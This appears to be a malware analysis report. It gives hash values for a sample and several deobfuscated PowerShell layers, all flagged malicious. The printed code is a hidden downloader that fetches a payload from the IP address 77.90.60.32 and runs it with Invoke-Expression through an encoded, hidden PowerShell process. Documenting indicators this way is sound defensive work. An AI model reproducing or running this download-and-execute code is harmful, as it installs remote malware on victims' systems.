|
Hash | Hash Value |
|---|---|
| MD5 | da9f9a2afb57086a039acd47e2a07d3a
|
| Sha1 | b90c206ce8dac8c18ecb4add7cfadfd79f3d7cd6
|
| Sha256 | f7d13cb6db2aefec961d1ba8cd01a9093d2e698c4878f02646918881b46f820a
|
| Sha384 | 4fa262b3d13bd7af77d0ae06cb621d9d296dbde44c37e4a46084bc7bdabeb14c7f9c678cac2f00dc4299c5aa4fdc499c
|
| Sha512 | a4f12f01990b6209a07109ec0b805bec74e913dc3ecfd82fb1a0d17143635da74cb6c256f1337eb1715ad3844040abbc117ca1d7aa7cca5534f58318a2862331
|
| SSDeep | 12:ZdKV1DwvziBncm0JNPTlOeAH+LgyaICQkmMhA9nCEFoI1kD8:ZAV1DwvH71lOe0+LAQshAlPqD8
|
| TLSH | A5F00E034F0769AACB96C2CAE0029800EC6E1936230638213DD09E602ECC4ECE032AF9
|
|
Name0 | Value |
|---|---|
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = @"$u = '$url' $h = New-Object -ComObject ('MSXML2.XMLHTTP'); $h.Open('GET', $u, $false); $h.Send(); if ($h.Status -eq 200) { Invoke-Expression $h.ResponseText } else { Write-Error ('??????: ' + $h.Status) }"@ $encoded = [Convert]::"ToBase64String"([Encoding]::"Unicode"."GetBytes"($psCode)) Start-Process "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded" |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string([encoding]::unicode.getbytes($pscode)) start-process powershell.exe -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded |
|
Name0 | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = @"$u = '$url' $h = New-Object -ComObject ('MSXML2.XMLHTTP'); $h.Open('GET', $u, $false); $h.Send(); if ($h.Status -eq 200) { Invoke-Expression $h.ResponseText } else { Write-Error ('??????: ' + $h.Status) }"@ $encoded = [Convert]::"ToBase64String"([Encoding]::"Unicode"."GetBytes"($psCode)) Start-Process "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -EncodedCommand $encoded" Malicious |
da9f9a2afb57086a039acd47e2a07d3a |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string([encoding]::unicode.getbytes($pscode)) start-process powershell.exe -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious |
da9f9a2afb57086a039acd47e2a07d3a > [Deobfuscated PS] |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious |
da9f9a2afb57086a039acd47e2a07d3a > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $url = "http://77.90.60.32/y.GRE" $psCode = "" $h = New-Object -ComObject "MSXML2.XMLHTTP" $h."Open"("GET", $u, $false) $h."Send"() if ($h."Status" -eq 200) { Invoke-Expression $h."ResponseText" } else { Write-Error ("??????: " + $h."Status") } "@ $encoded = [Convert]::" tobase64string ([encoding]::"unicode"."getbytes"($pscode)) Start-Process "powershell.exe" -argumentlist -noprofile -WindowStyle "Hidden" -EncodedCommand $encoded Malicious |
da9f9a2afb57086a039acd47e2a07d3a > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |